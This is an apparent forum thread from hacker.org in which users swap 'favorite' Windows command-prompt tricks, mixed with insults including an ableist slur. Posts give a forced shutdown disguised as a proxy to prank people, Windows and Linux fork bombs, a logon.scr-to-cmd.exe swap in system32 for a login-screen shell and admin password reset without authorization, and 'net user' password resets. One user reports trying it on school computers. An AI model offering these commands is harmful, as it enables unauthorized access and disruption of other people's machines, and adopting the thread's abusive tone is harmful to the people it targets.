CMD

Discussion about hacker.org's server
CoreEvil

Re: CMD

Post by CoreEvil »

0.Dark.Thought wrote:Hey. Any real hacker knows how to hack with the Command Prompt. So prove what you got. So post you're best codes and say what they do.

(F.I. my favroite is:)

shutdown -f

logs you off and people basiclly crap themselves when you desquise it as a myspace proxy.
You know you got me really motivated now, I'm gonna start telling you all about
my command prompt secrets, in fact I'm gonna tell you a real secret: you're mentally
retarded. Yes you are. Please don't get me wrong, I'm not trying to be offensive, the
reason I'm telling you this is that, I don't want you to proceed with a false hope of adequacy.
I say stop now and start investing your energy on something that you could be really good at.
You won't regret it.
You like pink, don't you?
canine

Post by canine »

CoreEvil wrote:
0.Dark.Thought wrote:Hey. Any real hacker knows how to hack with the Command Prompt. So prove what you got. So post you're best codes and say what they do.

shutdown -f

logs you off and people basiclly crap themselves when you desquise it as a myspace proxy.
my command prompt secrets, in fact I'm gonna tell you a real secret: you're mentally
retarded. Yes you are. Please don't get me wrong, I'm not trying to be offensive, the
reason I'm telling you this is that, I don't want you to proceed with a false hope of adequacy.
I say stop now and start investing your energy on something that you could be really good at.
You won't regret it.
This man is scathing and awesome.

If people worry about being criticized for being stupid, then perhaps they'll work a bit harder before spouting off something useless.

I worked for years to become less-than-stupid, and when I put forth some my opinion, it's actually worth something. Perhaps not a lot, but still, it has worth.
PaRaDoX

Post by PaRaDoX »

canine wrote:
CoreEvil wrote:

shutdown -f

You won't regret it.

If people worry about being criticized for being stupid, then perhaps they'll work a bit harder before spouting off something useless.

I worked for years to become less-than-stupid, and when I put forth some my opinion, it's actually worth something. Perhaps not a lot, but still, it has worth.
i know what you mean :P its just that your basic equation for the internet is something like nice normal person goes in -> out comes someone like 0.Dark.Thought.

~You are a glitch in my reasoning.
WhiteKnight

Post by WhiteKnight »

PaRaDoX wrote:
canine wrote:
CoreEvil wrote: You know you got me really motivated now, I'm gonna start telling you all about
You won't regret it.

i know what you mean :P its just that your basic equation for the internet is something like nice normal person goes in -> out comes someone like 0.Dark.Thought.
Well I don't know about that, he claim that he is going to change who he is and what he do.

Say give him a second chance? Everyone need a second chance.
0.Dark.Thought

Post by 0.Dark.Thought »

WhiteKnight wrote:
PaRaDoX wrote:
canine wrote: This man is scathing and awesome.

Well I don't know about that, he claim that he is going to change who he is and what he do.

Say give him a second chance? Everyone need a second chance.
Thanks alot White Knight I hate this post because i dont even use CMD anymore except for when my mom's internet goes down, but in all actuallity i agree with everyone else: people like who i used to be are just idiots (a.k.a. crackers) that really never get anywhere in life and i really have changed and almost hate my old self now. If you guys will give me another chance to aspire to be a real Hacker, I wont let it pass me by.

If I could fix my profile my new Signature would be:
"Maybe I'm Just Guilty Of Curiosity."

hey at least i wasnt another Crawler before I changed. 8) 8) 8)
Education is a progressive discovery of our own ignorance.
Kiyka

heh

Post by Kiyka »

All time favorite CMD code.

net user

net user <admin's name> *
password
password
exit
<3
dorahan

Post by dorahan »

there are so amny things that you can do with CMD. With it, we can tracing, and so decrypt a hash code, etc. But usually in Windows, i very often use CMD for ping my connection... Sometimes i use it for tracing route with 'tracert' command, and sometimes i use CMD for decrypt hash codes with Jack The Ripper tool... There are many other things that you can do with CMD... haha... We can do a lot of fun with CMD in Windows..
~� dorahan �~
HkRkoz al KuwaiT 2019 HaCkEr 101
lukas

Post by lukas »

you can create the shortest endless loop

simply write "%0" (yes thats all ^^)

%0 is a variable that contains the path and name from the running cmd-script

it means that the programm run itself again and again.
Allosentient

Post by Allosentient »

lukas wrote:you can create the shortest endless loop

simply write "%0" (yes thats all ^^)

%0 is a variable that contains the path and name from the running cmd-script

it means that the programm run itself again and again.
Try this one:

Windows: %0|%0
Linux: :(){ :|:& };:
PaRaDoX

Post by PaRaDoX »

naw yo. my favorite one of all time is

cd\
cd\windows\system32
mkdir dontworry
copy logon.scr dontworry\logon.scr
copy cmd.exe dontworry\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

:D

lol of course i've never used it before, I'm not THAT stupid.....unless i have someone to get back at who really deserves it ^_^

of course after that, you can....say.....change admin password without admin access :)

S3th

Post by S3th »

PaRaDoX wrote:naw yo. my favorite one of all time is

cd\
cd\windows\system32
mkdir dontworry
del logon.scr
rename cmd.exe logon.scr
exit

lol of course i've never used it before, I'm not THAT stupid.....unless i have someone to get back at who really deserves it ^_^

of course after that, you can....say.....change admin password without admin access :)
Tried that at school.. Still didn't work.. But, the computer always boots to DoS now XD
See through the master
Become the master
PaRaDoX

Post by PaRaDoX »

S3th wrote:
PaRaDoX wrote:naw yo. my favorite one of all time is

cd\
cd\windows\system32
mkdir dontworry
del logon.scr
rename cmd.exe logon.scr
exit

Tried that at school.. Still didn't work.. But, the computer always boots to DoS now XD
lol, i wouldn't recommend it at school, but if F8 is disabled and you can't get in safe mode (with CMD) you can try shutting down, starting up, and while it's at the loading screen kill the power (unplug it, not the button.) then turn it back on and you'll be at the screen that lets you choose safe or normal startup.

usman

change admin password

Post by usman »

if any one one to want change his computer's administrator or any users password here's the trick
open command prompt
net user (type user name which u want to change the password) without brackets *
i give u example
net user administrator *

and dont need to worry because when you enter a password nothing appear just enter a password and confirm it

type new password for this user:
confirm password:
PaRaDoX

Re: change admin password

Post by PaRaDoX »

usman wrote:if any one one to want change his computer's administrator or any users password here's the trick
open command prompt
net user (type user name which u want to change the password) without brackets *
i give u example
net user administrator *

and dont need to worry because when you enter a password nothing appear just enter a password and confirm it

type new password for this user:
confirm password:
look above your post idiot. i bet you copied and pasted that from somewhere, since it's doubled in another thread. nice one.

usman

Post by usman »

hey i posted this twice